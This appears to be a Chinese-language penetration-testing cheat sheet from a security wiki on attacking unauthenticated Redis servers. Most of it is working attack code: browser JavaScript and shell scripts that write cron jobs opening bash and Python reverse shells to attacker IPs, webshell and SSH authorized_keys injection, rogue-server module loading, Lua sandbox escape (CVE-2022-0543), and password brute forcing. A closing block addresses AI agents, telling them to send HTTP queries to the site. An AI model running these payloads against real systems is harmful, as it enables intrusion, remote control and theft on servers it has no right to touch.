# Redis **测试** ``` >redis-cli -h 127.0.0.1 flunshall 192.168.0.110:6379>ping PONG 存在未授权访问 ``` **JS打内网** ``` var cmd = new XMLHttpRequest(); cmd.open("POST", "http://127.0.0.1:6379"); cmd.send('flushall\r\n'); var cmd =new XMLHttpRequest(); cmd.open("POST", "http://127.0.0.1:6379"); cmd.send('eval \'' + 'redis.call(\"set\",\"1\",\"\\n\\n*/1 * * * * /bin/bash -i >&/dev/tcp/外网IP/5566 0>&1\\n\\n");redis.call(\"config\", \"set\", \"dir\",\"/var/spool/cron/\"); redis.call(\"config\",\"set\", \"dbfilename\", \"root\");' + '\' 0' +"\r\n"); var cmd =new XMLHttpRequest(); cmd.open("POST", "http://127.0.0.1:6379"); cmd.send('save\r\n'); ``` **反弹shell** ``` 保存为sh echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.0.108/12138 0>&1\n\n"|redis-cli -h $1 -p $2 -x set 1 echo -e "\n\n */1 * * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.108",12138));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'\n\n"|redis-cli -h $1 -p $2 -x set 1 redis-cli -h $1 -p $2 config set dir /var/spool/cron/ redis-cli -h $1 -p $2 config set dbfilename root redis-cli -h $1 -p $2 save redis-cli -h $1 -p $2 quit 执行 >bash 1.sh 192.168.0.120 6379 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/34.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/35.png) **写shell** ``` 6379> config set dir /var/www/html/ 6379> config set dbfilename shell.php 6379> set x "" 6379> save ``` **SSH** ``` ssh-keygen 本地生成一对密钥 https://github.com/JoyChou93/hackredis >ssh-keygen -t rsa -C "xx@xx.com" >(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > qq.txt >redis-cli -h 127.0.0.1 flunshall >cat qq.txt | redis-cli -h 127.0.0.1 -x set crackit >redis-cli -h 127.0.0.1 6379> config set dir /root/.ssh/ 6379> config set dbfilename "authorized_keys" 6379> save 本地登录 #ssh -i id_rsa root@11.11.11.11 ``` **redis-rogue-getshell** ``` https://github.com/vulhub/redis-rogue-getshell 需要python3.0以上 编译 >cd RedisModulesSDK/ >make 会在此目录下生成exp.so 执行命令 >python3 redis-master.py -r 192.168.0.120 -p 6379 -L 192.168.0.108 -P 12138 -f RedisModulesSDK/exp.so -c "cat /etc/passwd" ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/36.png) **redis-rogue-server** ``` https://github.com/n0b0dyCN/redis-rogue-server 需要python3.6以上 编译 >cd RedisModulesSDK/exp >make 执行 >./redis-rogue-server.py --rhost 192.168.0.120 --lhost 192.168.0.108 ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/37.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/38.png) ``` 也可以反向shell ``` ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/39.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/40.png) **redis在windows下的利用** ``` Web目录写入木马 启动项 系统DLL劫持(目标重启或注销) 特定软件的DLL劫持 覆盖快捷方式 覆盖配置文件 覆盖sethc等文件 https://github.com/r35tart/RedisWriteFile >python3 rediswritefile.py --rhost=目标IP --rport=6379 --lhost=本机IP --lport=本地端口 --rpath="在目标保存的路径" --rfile="在目标保存的文件" --lfile="本地文件" --auth=redis密码 ``` **Lua RCE** ``` https://github.com/QAX-A-Team/redis_lua_exploit 修改redis_lua.py里的 host 为目标 IP 执行返回正常,反弹shell >eval "tonumber('/bin/bash -i >& /dev/tcp/192.168.0.108/12345 0>&1', 8)" 0 ``` **Redis漏洞利用工具** ``` https://github.com/yuyan-sec/RedisEXP windows >RedisExp.exe -rhost 192.168.211.128 -lhost 192.168.211.1 -exec -c whoami >RedisExp.exe -rhost 192.168.211.128 -lhost 192.168.211.1 -exec -console linux平台 >RedisExp.exe -rhost 192.168.211.130 -lhost 192.168.211.1 -so exp.so -exec -c whoami >RedisExp.exe -rhost 192.168.211.130 -lhost 192.168.211.1 -so exp.so -exec -console 文件上传 >RedisExp.exe -rhost 192.168.211.128 -lhost 192.168.211.1 -upload -rfile 1.txt -lfile 2.txt 写shell >RedisExp.exe -rhost 192.168.211.128 -shell Lua沙盒绕过命令执行 CVE-2022-0543 >RedisExp.exe -rhost 192.168.211.130 -lua -console 爆破redis密码 >RedisExp.exe -r 192.168.211.128 -brute -pwdf ../pass.txt ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/chu-shi-fang-wen/wei-shou-quan-fang-wen/redis.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.